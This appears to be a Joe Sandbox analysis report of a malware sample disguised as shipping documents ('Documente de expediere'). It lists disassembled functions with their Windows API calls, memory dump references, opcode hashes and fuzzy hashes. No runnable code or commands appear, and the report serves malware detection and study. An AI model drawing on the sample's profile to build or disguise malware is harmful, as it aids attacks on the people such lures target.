                                                • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                • String ID:
                                                • API String ID: 2108273632-0
                                                • Opcode ID: 3b16942d1a3f777960d7ea8b0e70c6f6e8aa28e8558fa2dbdeea42a969660667
                                                • Instruction ID: 85a635cb367092d0cf2dc36130ee3660ffd1ee86f96a67be6ddbe23b6616546d
                                                • Opcode Fuzzy Hash: 3b16942d1a3f777960d7ea8b0e70c6f6e8aa28e8558fa2dbdeea42a969660667
                                                • Instruction Fuzzy Hash: A131F8719023879ADB60CF76CC44FF67BAEAB25381F108179F421D32A2D7B89846D794
                                                Function 006E8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 006E8F12
                                                • PostMessageW.USER32(?,00000201,00000001), ref: 006E8FBC
                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 006E8FC4
                                                • PostMessageW.USER32(?,00000202,00000000), ref: 006E8FD2
                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 006E8FDA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessagePostSleep$RectWindow
                                                • String ID:
                                                • API String ID: 3382505437-0
                                                • Opcode ID: 962663268c1e7db7808b4dc0a13f48552e4bdf7cf189b346e53c4e1205bba5c5
                                                • Instruction ID: 0c69876085edf0f5070556bc1796d82aea2f6bbb452582aa5798839dc0ec9434
                                                • Opcode Fuzzy Hash: 962663268c1e7db7808b4dc0a13f48552e4bdf7cf189b346e53c4e1205bba5c5
                                                • Instruction Fuzzy Hash: 9931DC71501259EFDB00CFA9D94CADE7BB6FB04325F108269F928AB2D0C7B49910DB90
                                                Function 006EB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 006EB6C7
                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 006EB6E4
                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 006EB71C
                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 006EB742
                                                • _wcsstr.LIBCMT ref: 006EB74C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                • String ID:
                                                • API String ID: 3902887630-0
                                                • Opcode ID: 7f750ae30dab7f32b769d09473aaea4551433a05ba95d4e0d83ce161d8d834e0
                                                • Instruction ID: 8e7f1d6cc2f2c14c47870858ec435723f78984508c2f1b56708654a2fe1ee977
                                                • Opcode Fuzzy Hash: 7f750ae30dab7f32b769d09473aaea4551433a05ba95d4e0d83ce161d8d834e0
                                                • Instruction Fuzzy Hash: 3A210771205344BAEB255B3A9C49EBB7BAEDF45710F10802DFC05CA2A1EF61CC819764
                                                Function 0071B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0071B44C
                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0071B471
                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0071B489
                                                • GetSystemMetrics.USER32(00000004), ref: 0071B4B2
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00701184,00000000), ref: 0071B4D0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$Long$MetricsSystem
                                                • String ID:
                                                • API String ID: 2294984445-0
                                                • Opcode ID: abef9352e6ad258406aa93389daf13a6add0aa72971ff6dcf7ef9921dd94b9e4
                                                • Instruction ID: fa008bbd499316a073e10fd697b25588f58cbbfcac6566bc95f9ed33383fec9c
                                                • Opcode Fuzzy Hash: abef9352e6ad258406aa93389daf13a6add0aa72971ff6dcf7ef9921dd94b9e4
                                                • Instruction Fuzzy Hash: 4A218071610295AFCB108F3CDC04AEA3BA4EB05721B10C738FD26C31E1E7389890DB80
                                                Function 006E97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006E9802
                                                  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006E9834
                                                • __itow.LIBCMT ref: 006E984C
                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006E9874
                                                • __itow.LIBCMT ref: 006E9885
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$__itow$_memmove
                                                • String ID:
                                                • API String ID: 2983881199-0
                                                • Opcode ID: 6324ad79cdfd9a6049da3840d769ccfc12a67c2ed4531a345b0e78f72831c8c0
                                                • Instruction ID: e5c0cad23f7d850e56a9506b09e5b322a85669d7bbfac0e859c4d1970c06986e
                                                • Opcode Fuzzy Hash: 6324ad79cdfd9a6049da3840d769ccfc12a67c2ed4531a345b0e78f72831c8c0
                                                • Instruction Fuzzy Hash: 6721F875701344ABDF109A668C86EEF7BBEDF49710F044039F904DB3A1EA708D4587A5
                                                Function 006912F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                Download Yara Rule
                                                APIs
                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0069134D
                                                • SelectObject.GDI32(?,00000000), ref: 0069135C
                                                • BeginPath.GDI32(?), ref: 00691373
                                                • SelectObject.GDI32(?,00000000), ref: 0069139C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ObjectSelect$BeginCreatePath
                                                • String ID:
                                                • API String ID: 3225163088-0
                                                • Opcode ID: dd4f1bf82aac42c4637159b4eab8b521de1be6ffe6382908246b01da33cadf2f
                                                • Instruction ID: 71604a398fa39ce845c301848059544a8e71182169ccb9de9cd718eb2f991d01
                                                • Opcode Fuzzy Hash: dd4f1bf82aac42c4637159b4eab8b521de1be6ffe6382908246b01da33cadf2f
                                                • Instruction Fuzzy Hash: 98215370800309EBDF108F15DC047E97BB9EB11322F64C216F411976A0D3B5A991DB54
                                                Function 006EC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID:
                                                • API String ID: 2931989736-0
                                                • Opcode ID: aa6d4d130a9d16da4102a13f643f77d9d8ca47e80a2659a08792df57ce1306a9
                                                • Instruction ID: ca3869fae398a7896f221d8f320c065b823044c5bf1da021ab5baf00e970933c
                                                • Opcode Fuzzy Hash: aa6d4d130a9d16da4102a13f643f77d9d8ca47e80a2659a08792df57ce1306a9
                                                • Instruction Fuzzy Hash: 0F01F5F26063557BE604A6229C52FEB735E9B223B4F444024FD049A383FA50DE5383E5
                                                Function 006F4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 006F4D5C
                                                • __beginthreadex.LIBCMT ref: 006F4D7A
                                                • MessageBoxW.USER32(?,?,?,?), ref: 006F4D8F
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 006F4DA5
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006F4DAC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                • String ID:
                                                • API String ID: 3824534824-0
                                                • Opcode ID: d24e8e9b0355a728c26ff3a85b919c2aefd45c7430e4f711fec0640ed962901f
                                                • Instruction ID: e0dfb6cf359431ff7490c3e638db9454f01a6a264d943ad1f17427e3efd12043
                                                • Opcode Fuzzy Hash: d24e8e9b0355a728c26ff3a85b919c2aefd45c7430e4f711fec0640ed962901f
                                                • Instruction Fuzzy Hash: 0D110C72904208BBC7019BAC9C04AEB7FADEB45321F14C365FA14D33A1D6B98D4087A0
                                                Function 006E874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006E8766
                                                • GetLastError.KERNEL32(?,006E822A,?,?,?), ref: 006E8770
                                                • GetProcessHeap.KERNEL32(00000008,?,?,006E822A,?,?,?), ref: 006E877F
                                                • HeapAlloc.KERNEL32(00000000,?,006E822A,?,?,?), ref: 006E8786
                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006E879D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 842720411-0
                                                • Opcode ID: ffc1156bfff9dc7c50cef5bf29c2443a732ef869cb58f93ecbe80ec8d1d44d18
                                                • Instruction ID: 7ac0c791ef2fe31fd83e2696d604f575242767420efc19ee442cb580d7888b43
                                                • Opcode Fuzzy Hash: ffc1156bfff9dc7c50cef5bf29c2443a732ef869cb58f93ecbe80ec8d1d44d18
                                                • Instruction Fuzzy Hash: C3014B71241248FFDB204FAADC88DAB7BADEF893557208569F849C32A0DA31CD00DA60
                                                Function 006F54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006F5502
                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 006F5510
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 006F5518
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 006F5522
                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006F555E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                • String ID:
                                                • API String ID: 2833360925-0
                                                • Opcode ID: 011323184ce37132390d8dc17d6a749918cab4061466d46d5c8a193d89fc81cd
                                                • Instruction ID: 548c3e4b585b67e1737fbf45c6fbf72c7d28c2fdd294be242fcc05b810a2380e
                                                • Opcode Fuzzy Hash: 011323184ce37132390d8dc17d6a749918cab4061466d46d5c8a193d89fc81cd
                                                • Instruction Fuzzy Hash: 6E012D35D00A2DEBCF00DFE9E849AEDBB7AFB09711F008156EA02F2240DB345A54D7A5
                                                Function 006E7652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E758C,80070057,?,?,?,006E799D), ref: 006E766F
                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E758C,80070057,?,?), ref: 006E768A
                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E758C,80070057,?,?), ref: 006E7698
                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E758C,80070057,?), ref: 006E76A8
                                                • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E758C,80070057,?,?), ref: 006E76B4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                • String ID:
                                                • API String ID: 3897988419-0
                                                • Opcode ID: 30181561ffd2dafda6b988f9c4595291de12f0ba29a4519f34e7f6e157125a96
                                                • Instruction ID: e9bf81b76789c92ff308a8f1d0d7ccaac4ec26060b9c6e812a1e2c88bf29f696
                                                • Opcode Fuzzy Hash: 30181561ffd2dafda6b988f9c4595291de12f0ba29a4519f34e7f6e157125a96
                                                • Instruction Fuzzy Hash: 6B01D472602704BBDB108F5DDC04BEA7BAEEB44755F108028FD04D3211E735DE0197A0
                                                Function 006E85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006E8608
                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006E8612
                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006E8621
                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006E8628
                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006E863E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 44706859-0
                                                • Opcode ID: bd924b43b6f613030febf65d9b0ef95057dacbb3f5ccb41adab79c8e77a63a03
                                                • Instruction ID: 68fb359894ef12957b7399be910590aac504a8630a0feeefc8a97f1ddd1688de
                                                • Opcode Fuzzy Hash: bd924b43b6f613030febf65d9b0ef95057dacbb3f5ccb41adab79c8e77a63a03
                                                • Instruction Fuzzy Hash: 04F0AF70201304BFEB100FA9DC99EEB3BADFF89754B008125F909C3290CB649C42DA60
                                                Function 006E8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006E8669
                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006E8673
                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E8682
                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006E8689
                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E869F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 44706859-0
                                                • Opcode ID: 1815d7d2d36fa9f89cb3d04e3d26aa7868fca0f39210839ba56e7f91eb6a52f6
                                                • Instruction ID: 9c9a512a0953904937cb52ecec26122a3de574340129babf5ee8d1ec4ef4f4b6
                                                • Opcode Fuzzy Hash: 1815d7d2d36fa9f89cb3d04e3d26aa7868fca0f39210839ba56e7f91eb6a52f6
                                                • Instruction Fuzzy Hash: BBF0C270201354BFEB111FA9EC88EE73BADEF89754B108025F909C3290CB74DD00DA60
                                                Function 006EC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 006EC6BA
                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 006EC6D1
                                                • MessageBeep.USER32(00000000), ref: 006EC6E9
                                                • KillTimer.USER32(?,0000040A), ref: 006EC705
                                                • EndDialog.USER32(?,00000001), ref: 006EC71F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                • String ID:
                                                • API String ID: 3741023627-0
                                                • Opcode ID: af6557342acacc556a69dcd31cde5e6c27ce985134dca7a79dfefe554b30beca
                                                • Instruction ID: cc3175a6316429c27ebc0059fe4bd9ec8a8dbb6216351b53ecebf98ebd3b522a
                                                • Opcode Fuzzy Hash: af6557342acacc556a69dcd31cde5e6c27ce985134dca7a79dfefe554b30beca
                                                • Instruction Fuzzy Hash: 7801A230500744ABEB205F25DC4EFD677B9FF00711F008669F542A14E0EBE4A9568F84
                                                Function 006913B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                Download Yara Rule
                                                APIs
                                                • EndPath.GDI32(?), ref: 006913BF
                                                • StrokeAndFillPath.GDI32(?,?,006CBAD8,00000000,?), ref: 006913DB
                                                • SelectObject.GDI32(?,00000000), ref: 006913EE
                                                • DeleteObject.GDI32 ref: 00691401
                                                • StrokePath.GDI32(?), ref: 0069141C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                • String ID:
                                                • API String ID: 2625713937-0
                                                • Opcode ID: ee2cd31cdcff9e78d3181f8d27841b246bce7f687e1844af7d5f87180831ce1a
                                                • Instruction ID: 0f8b68922be78dfe4b06cbdf421ed06c37d85c5b6f53f11dad4bfeddc386fdd6
                                                • Opcode Fuzzy Hash: ee2cd31cdcff9e78d3181f8d27841b246bce7f687e1844af7d5f87180831ce1a
                                                • Instruction Fuzzy Hash: FEF01930000749EBDF115F2AEC0C7E83BA9A725326F54C224E42A4A5F1C77999A5DF18
                                                Function 006A2E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006B0FF6: std::exception::exception.LIBCMT ref: 006B102C
                                                  • Part of subcall function 006B0FF6: __CxxThrowException@8.LIBCMT ref: 006B1041
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                  • Part of subcall function 00697BB1: _memmove.LIBCMT ref: 00697C0B
                                                • __swprintf.LIBCMT ref: 006A302D
                                                Strings
                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 006A2EC6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                • API String ID: 1943609520-557222456
                                                • Opcode ID: 6a704e253c4fa39f94f068cf61e8c145b55e44df81915b6c157b61f3cff15745
                                                • Instruction ID: cff9607a13bf2f2d0fbc0a84fa200dcb4e6e1b120e8b04b4674f05885cd74378
                                                • Opcode Fuzzy Hash: 6a704e253c4fa39f94f068cf61e8c145b55e44df81915b6c157b61f3cff15745
